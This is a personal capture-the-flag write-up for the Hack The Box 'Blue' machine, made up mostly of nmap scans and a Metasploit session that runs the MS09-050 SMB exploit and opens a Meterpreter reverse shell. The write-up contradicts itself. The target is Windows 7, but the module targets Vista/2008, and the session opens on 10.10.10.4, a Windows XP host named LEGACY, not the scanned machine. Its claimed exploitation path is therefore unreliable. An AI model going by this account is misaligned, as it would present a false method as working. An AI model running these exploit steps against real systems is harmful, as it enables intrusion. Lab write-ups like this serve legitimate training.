This is my Hack the box's Blue machine write-up.
OS: Windows
IP: 10.10.10.40
Difficulty: Easy
Nmap scan on the target:
nmap -sV -sC -oN blue.nmap $BLUE
Flags:
-sV
: Version detection-sC
: Script scan using the default set of scripts-oN
: Output in normal nmap format
root@kali:/home/kali# nmap -sV -sC -oN blue.nmap $BLUE
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:15 EDT
Nmap scan report for 10.10.10.40 (10.10.10.40)
Host is up (0.24s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -7m31s, deviation: 34m36s, median: 12m27s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-26T22:28:52+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-26T21:28:53
|_ start_date: 2020-08-25T21:54:33
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.63 seconds
Let's try a vuln analysis using nmap:
root@kali:/home/kali# nmap -sV --script=vuln 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 17:19 EDT
Nmap scan report for 10.10.10.40 (10.10.10.40)
Host is up (0.28s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.23 seconds
CVE-2009-3103 refers to MS09-050. Get candidates from the msfconsole:
msf5 > search MS09-050
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
2 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Exploit using one of them:
msf5 > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > options
Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
WAIT 180 yes The number of seconds to wait for the attack to complete.
Exploit target:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf5 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 10.10.14.32:4444
[*] 10.10.10.40:445 - Connecting to the target (10.10.10.40:445)...
[*] 10.10.10.40:445 - Sending the exploit packet (938 bytes)...
[*] 10.10.10.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.32:4444 -> 10.10.10.4:1065) at 2020-08-26 17:35:20 -0400
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
From here is trivial to catch user and root flags. Note that at the moment of writing this the hashes obtained weren't being accepted by the HTB dashboard.